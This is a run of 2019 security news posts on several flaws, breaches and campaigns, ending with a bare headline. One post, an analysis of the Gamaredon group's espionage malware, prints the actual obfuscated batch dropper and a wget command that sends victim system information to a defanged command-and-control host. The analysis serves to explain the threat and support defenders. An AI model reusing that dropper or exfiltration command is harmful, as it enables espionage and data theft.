The attack leverages a flaw in the Qualcomm Secure Execution Environment (QSEE), designed to securely store cryptographic keys on devices.

“A side-channel attack can extract private keys from certain versions of Qualcomm’s secure keystore. Recent Android devices include a hardware-backed keystore, which developers can use to protect their cryptographic keys with secure hardware.” reads a blog post published by NCC Group. “On some devices, Qualcomm’s TrustZone-based keystore leaks sensitive information through the branch predictor and memory caches, enabling recovery of 224 and 256-bit ECDSA keys. “

Qualcomm

According to NCC, the Hardware-backed keystores rely on ARM TrustZone to protect sensitive data, it splits execution on many devices into a secure world (used to manage sensitive data) and a normal world (used by processes of the Android OS).

Experts pointed out that the two worlds have the same underlying microarchitectural structures, meaning an attacker could carry out a side-channel attack to access protected memory.

The experts used a memory cache analyzer called Cachegrab to carry out
side-channel attacks on TrustZone.

The experts tested a rooted Nexus 5X device using the Qualcomm Snapdragon 808 and discovered that the QSEE that leaking data that could be used to recover 256-bit ECDSA keys.

The attacker must have root access to the device to launch the attack.

Qualcomm has released a security patch to address the flaw tracked as CVE-2018-11976, while Android disclosed a patch for the flaw in its April update.

Below the timeline of the flaw:

  • March 19, 2018: Contact Qualcomm Product Security with issue; receive confirmation of receipt
  • April, 2018: Request update on analysis of issue
  • May, 2018: Qualcomm confirms the issue and begins working on a fix
  • July, 2018: Request update on the fix; Qualcomm responds that the fix is undergoing internal review
  • November, 2018: Request update on the timeline for disclosure; Qualcomm responds that customers have been notified in October, beginning a six-month carrier recertification process. Agree to April 2019 disclosure date.
  • March, 2019: Discuss publication plans for April 23
  • April, 2019: Share draft of paper with Qualcomm
  • April 23, 2019: Public Disclosure
  • Providing technologies that support robust security and privacy is a priority for Qualcomm,” a Qualcomm spokesperson told Threatpost. “We commend the NCC Group for using responsible disclosure practices surrounding their security research. Qualcomm Technologies issued fixes to OEMs late last year, and we encourage end users to update their devices as patches become available from OEMs.”

Technical details of the vulnerability are available in the paper published by the expert.

Pierluigi Paganini

(SecurityAffairs – Qualcomm, mobile)

The post Critical flaw in Qualcomm chips exposes sensitive data for Android Devices appeared first on Security Affairs.

Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites

Security experts discovered hosted on GitHub the skimmer scripts used by Magecart cybercrime gang to compromised Magento installations worldwide.

Experts discovered the Magecart skimmer scripts used to compromise a few hundred e-commerce websites worldwide hosted on GitHub.

Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data on, but they are quite different from each other. 

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

Early April, the security firm Group-IB issued a new comprehensive report on the analysis of JavaScript-sniffers – a type of malware designed to steal customer payment data from online stores. 2440 infected e-commerce websites with a total of around 1.5 million unique daily visitors whose data could have been compromised, were analyzed by Group-IB researchers

Experts at MalwareBytes discovered a MageCart skimmer script hosted on Github that was uploaded on April 20 and quickly removed by the platform after the experts reported the discovery to the company.

“This latest skimmer is a hex-encoded piece of JavaScript code that was uploaded to GitHub on April 20 by user momo33333, who, as it happens, had just joined the platform on that day as well.” reads the analysis published by MalwareBytes.

MageCart skimmer script

The script was uploaded on GitHub by the user ‘momo33333’ who was registered with the platform during the same day.

Jérôme Segura, a security researcher at MalwareBytes, observed
momo33333 during the process of setting up the skimmer script. The user initially started with a couple of tests, the published the final obfuscated skimmer payload, ready to be used in campaigns against Magento-based e-commerce stores.

“Just like with any other kind of third-party plugins, compromised Magento sites are loading this script within their source code, right after the CDATA script and/or right before the </html> tag: ” wrote Segura.

“It’s worth noting that the compromised Magento sites will remain at risk, even if the GitHub-hosted skimmer is taken down. Indeed, attackers can easily re-infect them in the same manner they initially injected the first one.”

Querying the urlscan.io and PublicWWW search engines it is possible to determine that at least a couple of hundred websites were compromised using the Magecart skimmers script hosted to GitHub.

As usual let me suggest to keep your install up to date running the latest version of CMS and plugins.

“It is critical for e-commerce site owners to keep their CMS and its plugins up-to-date, as well as using secure authentication methods. Over the past year, we have identified thousands of sites that are hacked and posing a risk for online shoppers,” concludes the researcher.

Pierluigi Paganini

(SecurityAffairs – GitHub, Magecart skimmer scripts)

The post Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites appeared first on Security Affairs.

Docker Hub Database hacked, 190,000 users impacted

Docker became aware of unauthorized access to a Docker Hub database that exposed sensitive information for roughly 190,000 users.

Docker notified its users that an unauthorized entity gained access to a Docker Hub database that exposed sensitive information for roughly 190,000 users.

The exposed information included some usernames and hashed passwords, as well as tokens for GitHub and Bitbucket repositories.
The tokens allow development teams to automatically re-build their images on Docker Hub.

The exposure of the token could allow an attacker to modify an image and rebuild it depending on the permissions stored in the token, a typical supply chain attack scenario.

Docker was informed of the unauthorized access to a Hub database on April 25th, 2019.

“On Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data. Upon discovery, we acted quickly to intervene and secure the site.” reads the data breach notice sent to the impacted users via email.

“During a brief period of unauthorized access to a Hub database, sensitive data from approximately 190,000 accounts may have been exposed (less than 5% of Hub users). Data includes usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.”

docker logo-696x364

The organization confirmed to have already revoked all the exposed tokens and access keys.

“it is important for developers who used Docker Hub autobuild to check their project’s repositories for unauthorized access. ” reads a blog post published by Bleeping computer that first reported the news. “Even worse, with these notices coming late on a Friday night, developers potentially have a long night ahead of them as they assess their code.

The test of the data breach notification notice is available here:

https://news.ycombinator.com/item?id=19763413

Maintainers of the open source project are asking users to change their password on Docker Hub and any other accounts that shared the same credentials.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Docker Hub Database hacked, 190,000 users impacted appeared first on Security Affairs.

Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension

WordPress-based eCommerce websites using the WooCommerce plugin are at risk of full compromise due to an unpatched vulnerability.

A WordPress security firm called ‘Plugin Vulnerabilities’ has discovered a critical vulnerability in the WooCommerce plugin that exposes
WordPress-based eCommerce websites to hack.

The vulnerability affects the WooCommerce Checkout Manager plugin that allows owners of e-commerce websites based on WordPress and running the WooCommerce plugin to customize forms on their checkout pages.

The experts discovered an “arbitrary file upload” vulnerability that can be exploited by unauthenticated, remote attackers when the websites have “Categorize Uploaded Files” option enabled within WooCommerce Checkout Manager plugin settings.

Currently the plugin is used by more than 60,000 websites.

The company decided to publish the details of the flaw and a proof-of-concept exploit to protest against maintainers of the WordPress Support forum. It declared that over the years has tried to report the vulnerabilities directly to the WordPress Support forum without success because the moderators have been systematically removed their posts warning the community.

The company is focused on discovering vulnerabilities in popular and widely adopted WordPress plugins.

Analyzing the code, the experts discovered that at line 2084 of the
‘includes/admin.php’ file the application moves specific files to a directory using ‘move_uploaded_file’ without prior proper check for allowed files,”

The vulnerability could be exploited by attackers to execute arbitrary server-side script code in the context of the web server process and compromise the application to access or modify data or gain administrative access.

“If that is enabled then the following code will be used, which allows arbitrary files to be uploaded: ” wrote the experts.

woocommerce

“So a hacker could use that to upload malicious .php files at a location they could then access, as the proof of concept below shows.”

Below the proof-of-concept released by the experts:

woocommerce

Even the latest WooCommerce Checkout Manager version 4.2.6 is affected by the flaw.

To mitigate the flaw the experts suggest owners of WordPress websites using the WooCommerce Checkout Manager plugin to either disable “Categorize Uploaded Files” option or disable the plugin.

Pierluigi Paganini

(SecurityAffairs – WooCommerce, hacking)

The post Experts release PoC exploit for unpatched flaw in WordPress WooCommerce Extension appeared first on Security Affairs.

Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices

Experts at Cisco Talos group disclosed a dozen vulnerabilities uncovered in Sierra Wireless AirLink gateways and routers, including several serious flaws.

Researchers at Cisco Talos group disclosed a dozen vulnerabilities affecting Sierra Wireless AirLink gateways and routers, including several serious flaws. Some of the flaws could be exploited to execute arbitrary code, modify passwords, and change system settings,

Sierra Wireless AirLink gateways and routers are widely used in enterprise environments to connect industrial equipment, smart devices, sensors, point-of-sale (PoS) systems, and Industrial Control systems (ICSs).

“Several exploitable vulnerabilities exist in the Sierra Wireless AirLink ES450, an LTE gateway designed for distributed enterprise, such as retail point-of-sale or industrial control systems.” reads the analysis published by Cisco Talos.

“These flaws present a number of attack vectors for a malicious actor, and could allow them to remotely execute code on the victim machine, change the administrator’s password and expose user credentials, among other scenarios.”

Most of the issues reside in ACEManager, the web server included with the ES450. 

Sierra Wireless es450

Experts discovered three flaws classified as “critical” (CVSS score 9.9) that can be exploited by an attacker to make changes to any system settings and execute arbitrary commands and code. An authenticated attacker could exploit the flaw by sending specially crafted HTTP requests to the targeted device.

Other three flaws, rated as “high severity,” could be exploited by an authenticated attacker to change the user password and obtain plaintext passwords and other sensitive information. One of the issues affects the SNMPD function of the Sierra Wireless AirLink ES450  and it can be exploited by attackers to activate hardcoded credentials on a device, resulting in the exposure of a privileged user.

The remaining issues have been classified as “medium severity,” they include cross-site request forgery (CSRF), cross-site scripting (XSS), and information disclosure issues.

At the time of writing, Sierra Wireless has yet to release a security advisory for these vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – IoT, hacking)

The post Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices appeared first on Security Affairs.

Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws

Experts discovered security flaws in the iLnkP2P peer-to-peer (P2P) system that exposes millions of IoT devices to remote attacks.

Security expert Paul Marrapese discovered two serious vulnerabilities in the iLnkP2P P2P system that ìs developed by Chinese firm Shenzhen Yunni Technology Company, Inc. The iLnkP2P system allows users to remotely connect to their IoT devices using a mobile phone or a PC.
Potentially affected IoT devices include cameras and smart doorbells.

The iLnkP2P is widely adopted by devices marketed from several vendors, including Hichip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM.

The expert identified over 2 million vulnerable devices exposed online,
39% of them are located in China, 19% in Europe, and 7% in the United States. Roughly 50% of vulnerable devices is manufactured by Chinese company Hichip.

The first iLnkP2P flaw tracked as CVE-2019-11219 is an enumeration vulnerability that could be exploited by an attacker to discover devices exposed online. The second issue tracked as CVE-2019-11220 can be exploited by an attacker to intercept connections to vulnerable devices and conduct man-in-the-middle (MitM) attacks.

An attacker could chain the issues to steal password theft and possibly remotely compromise the devices, he only needs to know the IP address of the P2P server used by the device.

Marrapese also built a proof-of-concept attack to demonstrate how to steal passwords from devices by abusing their built-in “heartbeat” feature, but he will not release it to prevent abuse.

“Upon being connected to a network, iLnkP2P devices will regularly send a heartbeat or “here I am” message to their preconfigured P2P servers and await further instructions.” reported Brian Krebs.

“A P2P server will direct connection requests to the origin of the most recently-received heartbeat message,” Marrapese said. “Simply by knowing a valid device UID, it is possible for an attacker to issue fraudulent heartbeat messages that will supersede any issued by the genuine device. Upon connecting, most clients will immediately attempt to authenticate as an administrative user in plaintext, allowing an attacker to obtain the credentials to the device.”

iLnkP2P flaws

The expert attempted to report the flaws to the impacted vendors since January, but he did receive any response from them. The expert reported the flaws to the CERT Coordination Center (CERT/CC) at the Carnegie Mellon University, the Chinese CERT was also informed of the discovery.

The bad news is that there is no patch to address both issues and experts believe they are unlikely to be released soon,

“The nature of these vulnerabilities makes them extremely difficult to remediate for several reasons,” Marrapese wrote. “Software-based remediation is unlikely due to the infeasibility of changing device UIDs, which are permanently assigned during the manufacturing process. Furthermore, even if software patches were issued, the likelihood of most users updating their device firmware is low. Physical device recalls are unlikely as well because of considerable logistical challenges. Shenzhen Yunni Technology is an upstream vendor with inestimable sub-vendors due to the practice of white-labeling and reselling.”

Marrapese recommends discarding vulnerable products, he also suggests restricting access to UDP port 32100 to prevent external connections via P2P.

The researcher published technical details on his discovery here.

Pierluigi Paganini

(SecurityAffairs – iLnkP2P flaws, IoT)

The post Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws appeared first on Security Affairs.

Beapy Cryptojacking campaign leverages EternalBlue exploit to spread

Security experts uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit.

Security experts at Symantec have uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit to spread a cryptocurrency malware on enterprise networks in Asia.

“Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.” reads the analysis published Symantec.

Beapy (W32.Beapy) is a file-based coinminer that uses email as an initial infection vector.”

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system, it is installed by leveraging the ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploitthat could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

Every Window machine running an old vulnerable version that exposes an SMB service is at risk of hack. The DOUBLEPULSAR and ETERNALBLUE are now available for anyone after the archive of NSA tools was leaked online by ShadowBrokers hacker group.

Most of the victims are located in China (80%), remaining in South Korea, Japan, and Vietnam.

The experts first observed the campaign in January, almost any victim is an enterprise (98%).

The attack chain starts with phishing email using as an attachment the Excel document that downloads the DoublePulsar backdoor used to deliver the EternalBlue exploit.

Once the backdoor is installed, a PowerShell command will allow the malware to connect the command and control server. The malicious code executes more PowerShell scripts before the crypto currency miner is downloaded.

Experts reported that the Beapy malware also uses the popular post-exploitation tool Mimikatz to steal passwords from Windows systems.

Experts at Symantec also discovered an earlier version of Beapy malware that hit a public-facing web server and that was attempting to spread to connected systems.

It was coded in C rather than Python, this version also includes both
EternalBlue and Mimikatz.
The malicious code also leverages other exploits for known vulnerabilities in Apache Struts, Apache Tomcat, and Oracle WebLogic Server.

“In the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-5638). This vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution.” continues the analysis. “Beapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic Server (CVE-2017-10271). In the case of this web server compromise observed by Symantec, exploit attempts began in early February, with connections to Beapy’s C&C server first observed on March 13. Activity targeting this web server continued until early April.”

Experts observed a spike in the activity of Beapy in March:

Beapy malware

Since Coinhive cryptocurrency mining service shut down in March, experts observed a drop in cryptojacking attacks.

Unlike Coinhive, Beapy is a file-based miner that must be installed by attackers on the victims’ machines in order to mine cryptocurrency.

“As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.” states Symantec, “The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.”

Beapy-malware-

The Beapy campaign was also spotted by other security firms, including Qihoo 360’s research team and a Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Beapy miner, hakcing)

The post Beapy Cryptojacking campaign leverages EternalBlue exploit to spread appeared first on Security Affairs.

Crooks abuse GitHub platform to host phishing kits

Experts at Proofpoint discovered that free code repositories on GitHub have been abused since at least 2017 to host phishing websites.

Researchers at Proofpoint reported that crooks are abusing free code repositories on GitHub to host phishing websites and bypass security defenses. Experts discovered that cybercriminals are abusing the GitHub service since at least mid-2017.

The phishing websites were hosted on the canonical $github_username.github.io domain. Attackers are using stolen brand graphics to make their pages resemble the brand they were abusing.

“Since at least mid-2017, phishers have also been abusing free code repositories on the popular GitHub service to host phishing websites on the canonical  $github_username.github.io domain.” reads the post published by Proofpoint. “threat actors establish a canonical code repository site within the github.io canonical domain that resembles the brand they are abusing.”

The inspection of the lookalike GitHub account used by crooks revealed
the files in the phishing kit are viewable as follows, experts noticed that the HTML code is lightly encoded in order to obfuscate the content.

phishing Github sites

The code sends credentials provided by the users in an HTTP POST request to another compromised site under the control of the attackers.

The phishing kits do not use typical hosted PHP methods because the github.io platform does not provide PHP back-end services.

Experts observed that cybercriminals in some cases used the github.io domain as a traffic redirector with the intent to ensure that the actual phishing page remains live for a bit longer.

The drawback in using public GitHub accounts it that security researchers have major visibility into the threat actors’ activity and on the changes to their phishing pages.

Proofpoint identified a particular user, “greecpaid,” who manages several phishing kits hosted on GitHub repositories.

Proofpoint reported its findings to GitHub that took down the accounts hosting phishing kits.

“In the past, threat actors have been able to evade detection by using well-known and trusted consumer cloud, social networking, and commerce services to host files as well as web hosts. Microsoft’s free accounts on the GitHub service, which have typically been used for Open Source and other public software development repositories, are equally vulnerable to widespread abuse,” Proofpoint concludes. 

Pierluigi Paganini

(SecurityAffairs – GitHub, cybercrime)

The post Crooks abuse GitHub platform to host phishing kits appeared first on Security Affairs.

Flaws in Social Warfare plugin actively exploited in the wild

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the popular WordPress plugin Social Warfare.

Social Warfare is a popular ùWordPress plugin with more than 900,000 downloads, it allows to add social share buttons to a WordPress website.

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the Social Warfare plugin to take control over WordPress websites using it.

At the end of March, experts found a Cross-Site Scripting (XSS) vulnerability in Social Warfare installations (v3.5.1 and v3.5.2) that is actively exploited to add malicious redirects.

Maintainers of Social Warfare for WordPress also addressed a remote code execution (RCE), both issues were tracked as CVE-2019-9978.

The issue in the WordPress plugin has been fixed with the release of the 3.5.3 version of the plugin. In the same day, an unnamed security researcher published technical details of the flaw and a proof-of-concept exploit for the stored Cross-Site Scripting (XSS) vulnerability.

Experts pointed out that attackers can exploit the vulnerabilities to take complete control over websites and servers and use them for malicious purposed, such as mining cryptocurrency or deliver malware.

The availability of the exploit code allowed attackers attempting to exploit the vulnerability, but hackers were only able to inject JavaScript code to redirect users to malicious sites.

Experts at Palo Alto Network discovered several exploits for both vulnerabilities in the wild, including an exploit for the RCE one.

“We also caught several samples exploiting these vulnerabilities in the wild,” reads a blog post published by PaloAlto Network Unit42 researchers. “Figure 5 shows a POST request from one of the samples: “

Social Warfare zero-day PoC

The root cause of both flaws is the misuse of the is_admin() function in WordPress.

“The root cause of each of these two vulnerabilities is the same: the misuse of the is_admin() function in WordPress,” the researchers say in a blog post. “Is_admin only checks if the requested page is part of admin interface and won’t prevent any unauthorized visit.”

Experts found about 40,000 sites that are using the Social Warfare plugin, most of which are running a vulnerable version.

Vulnerable websites belong to many industries, such as education, finance sites, and news, experts highlighted that many of these sites receive high traffic.

“There are many exploits in the wild for the Social Warfare plugin and it is likely they will continue to be used maliciously. Since over 75 million websites are using WordPress and many of the high traffic WordPress websites are using the Social Warfare plugin, the users of those websites could be exposed to malware, phishing pages or miners.” concludes PaloAlto Network. “Website administrators should to update the Social Warfare plugin to 3.5.3 or newer version.”

Pierluigi Paganini

(SecurityAffairs – WordPress, Social Warfare plugin)



The post Flaws in Social Warfare plugin actively exploited in the wild appeared first on Security Affairs.

A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites

A serious flaw in some of Rockwell Automation’s MicroLogix and CompactLogix PLCs can be exploited by a remote attacker to redirect users to malicious websites.

Some of Rockwell Automation’s MicroLogix and CompactLogix PLCs are affected by a serious vulnerability can be exploited by a remote attacker to redirect users to malicious websites.

The vulnerabilyt was tracked as CVE-2019-10955 and received a CVSS score of 7.1 (high severity), it affects MicroLogix 1100 and 1400, and CompactLogix 5370 (L1, L2 and L3) controllers.

Both the ICS-CERT and Rockwell Automation published a security advisory.

The flaw is an open redirect vulnerability that ties the web server running on vulnerable devices. According to the expert, the web server accepts user input from the PLCs web interface and a remote, unauthenticated attacker can inject a malicious link that redirects users from the controller’s web server to a malicious website.

“Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to input a malicious link redirecting users to a malicious website.” reads the advisory published by the US ICS-CERT.

“An open redirect vulnerability could allow a remote unauthenticated attacker to input a malicious link to redirect users to a malicious site that could run or download arbitrary malware on the user’s machine.”

Rockwell Automation’s MicroLogix

According to the attack scenario described in the security advisory published by Rockwell (available to registered users), the malicious website could be used to deliver malware on the user’s machine.

“This malicious website could potentially run or download arbitrary malware on the user’s machine. The target of this type of attack is not the industrial control device and does not disrupt its control functionality,” reads the advisory published by Rockwell.

Rockwell has released firmware updates that address the vulnerability for the affected controllers. To mitigate the issue it is possible to disable the web server.

Below the recommendations published by Rockwell Automation to minimize the risk of exploitation of this vulnerability:

  • Update to the latest available firmware revision that addresses the associated risk.
  • Use trusted software, software patches, anti-virus/anti-malware programs, and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

The ICS-CERT credited Josiah Bryan and Giancarlo Palavicini for reporting this vulnerability to NCCIC.

Pierluigi Paganini

(SecurityAffairs – Rockwell, hacking)

The post A flaw in Rockwell Controller allows attackers to redirect users to malicious Sites appeared first on Security Affairs.

Zero-day vulnerability in Oracle WebLogic

Security experts are warning of a dangerous zero-day remote code vulnerability that affects the Oracle WebLogic service platform.


Oracle WebLogic wls9_async and wls-wsat components are affected by a deserialization remote command execution zero-day vulnerability.

This zero-day flaw affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

Weblogic zeroday

According to the bulletin CNTA-2019-0015 issued by CNCERT/CC, the flaw affects the WebLogic 10.x and WebLogic 12.1.3 versions. The criticality flaw has not yet been addressed by Oracle.

Experts recomments to disable vulnerable modules “wls9_async_response.war” and “wls-wsat.war”, or to inhibit access to URLs “/ _async / * “and” / wls-wsat / * “within Oracle WebLogic installs.

Experts at KnownSec 404 Team searched for vulnerable instances online by using the ZoomEye search engine, they found 36,173 installs, most of them in the US and China.

Weblogic zeroday 2

Experts at F5 Labs revealed to have already spotted a campaign exploiting the zero-day flaw in Weblogic servers.

Pierluigi Paganini

(SecurityAffairs – Weblogic, zero-day)

The post Zero-day vulnerability in Oracle WebLogic appeared first on Security Affairs.

The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign

Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state-actor dubbed Gamaredon.

Introduction

Few days after the publication of our technical article related to the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier on-going operation.

This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon.  The Gamaredon APT was first spotted in 2013 and in 2015, when researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon, targeting other Ukrainian entities. Their “special attention” on Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.

The discovered attack appears to be designed to lure military personnel: it  leverage a legit document of the “State of the Armed Forces of Ukraine” dated back in the 2nd April 2019. 

Figure 1: Fake document shown after infection

For this reason, Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.

Sha25641a6e54e7ac2d488151d2b40055f3d7cacce7fb53e9d33c1e3effd4fce801410
ThreatGamaredon Pteranodon stager (SFX file)
Ssdeep12288:VpRN/nV+Nn3I4Wyawz2O7TE+sNEAMqdJnGB6q5c7pQbaOwWsAsK0iR7bkfeanZ8O:VpT/nV+N3I

Table 1: Information about analyzed sample

Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle software with an invalid signature. Its expiration date has been set up the 16th of March 2019.

Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the  SFX archive reveals four different files. One of them is batch file containing the actual infection routine.

Figure 3: Files contained in SFX archive
@echo offset xNBsBXS=%random%*JjuCBOSFor %%q In (wireshark procexp) do (TaskList /FI “ImageName EQ %%q.exe” | Find /I “%%q.exe”)If %ErrorLevel% NEQ 1 goto exitIf SddlzCf==x86 Set WqeZfrx=x64if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset “ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\”CEFNPKLIf SddlzCf==x86 Set WqeZfrx=x64set “UlHjSKD=%USERPROFILE%”set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset fnQWAZC=winsetupset xNBsBXS=%random%*JjuCBOSset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset “paJvVjr=Document”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset eBqwVLK=%fnQWAZC%.lnkCEFNPKLif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset YFCaOEf=28262set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset vvozoFB=11326set lDwWuLo=26710If SddlzCf==x86 Set WqeZfrx=x64set prJqIBB=dcthfdyjdfcdst,tvset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOStaskkill /f /im %fnQWAZC%.exeCEFNPKLRENAME “%lDwWuLo%” %lDwWuLo%.exeset xNBsBXS=%random%*JjuCBOS%lDwWuLo%.exe “-p%prJqIBB%set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXScopy /y “%fnQWAZC%” “%UlHjSKD%\%fnQWAZC%.exe”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSif exist “%UlHjSKD%\%fnQWAZC%.exe” call :GhlJKaGIf SddlzCf==x86 Set WqeZfrx=x64if not exist “%UlHjSKD%\%fnQWAZC%.exe” call :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%YFCaOEf%” %eBqwVLK%if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOScopy “%eBqwVLK%” “%ldoGIUv%” /yset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSRENAME “%vvozoFB%” “%paJvVjr%.docx”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS”%CD%\%paJvVjr%.docx”set xNBsBXS=%random%*JjuCBOSexit /b
:GhlJKaGif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSstart “” “%UlHjSKD%\%fnQWAZC%.exe”CEFNPKLexit /b
:PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%fnQWAZC%” %fnQWAZC%.exe::6start “” “%fnQWAZC%.exe”If SddlzCf==x86 Set WqeZfrx=x64exit /b

Firstly, this batch script looks for the presence of running Wireshark and Process Explorer programs through the tasklist.exe utility. Then it renames the “11326” file in “Document.docx” and opens it. This is the decoy document seen in Figure 1. 

The third step is to extract the contents of the password protected archive named “26710”. The scripts uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing them it on “%USERPROFILE%\winsetup.exe” and creating a LNK symlink into the “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\” directory to ensure its persistence.

Sha256653a4205fa4bb7c58ef1513cac4172398fd5d65cab78bef7ced2d2e828a1e4b5
ThreatGamaredon Pteranodon stager (SFX)
Ssdeep12288:9pRN/nV+Nn4mNoks/EysKvqjigldJuFjBqg9DmTBs34I8:9pT/nV+N4QokKK7zg9qgQI8

Table 2: Information about SFX stager

This additional file is a SFX file containing another script and a PE32 binary.

Figure 4: Files contained in SFX archive

MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Window, a free utility for non-interactive HTTP downloads and uploads, a flexible tool commonly used by sys-admins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the malware gather information about the compromised machine through the command “systeminfo.exe”. The results are stored into the file “fnQWAZC” and then sent to the command and control server “librework[.ddns[.net”, leveraging the wget utility previously found.

Figure 5: The C2 and obfuscations technique
MicrosoftCreate.exe –user-agent=”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0″ –post-data=”versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host:                            ADMIN-PC+###…….”
Figure 6: Information about victim machine sent to C2

The malware also schedules the execution of two other actions.

Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.ddns[.net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_cash.exe”, is stored into the  “%APPDATA%\Roaming\Microsoft\IE\” folder. Despite the different name, it actually is another copy of the wget tool.

Figure 8: Persistence through task schedule (II)

The second scheduled activity is planned every 32 minutes and it is designed to run the files downloaded by the previous task. A typical trick part of the Gamaredon arsenal from long time: in fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant edits with respect to previous variants.

In the end, investigating the “librework[.ddns[.net” domain we discovered several other samples connect to the same C2. All of them appeared in-the-wild during the first days of April, suggesting the command infrastructure might still be fully functional.

Figure 9: other samples linked to “librework[.ddns[.net” C2 (Source:VT)

Conclusion

The Pteranodon implant seems to be constantly maintained by the Gamaredon APT group since 2013, a tool the attackers found very effective since they are still using it after such a long time. Apart this technical consideration, is quite interesting to notice how strong seems to be the Russian interest towards the East-Europe, along with the other recent state-sponsored activities possibly aimed to interfere with the Ukrainian politics (See “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber-threat is operating in several fronts.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, Gamaredon)

The post The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign appeared first on Security Affairs.

OilRig APT uses Karkoff malware along with DNSpionage in recent attacks

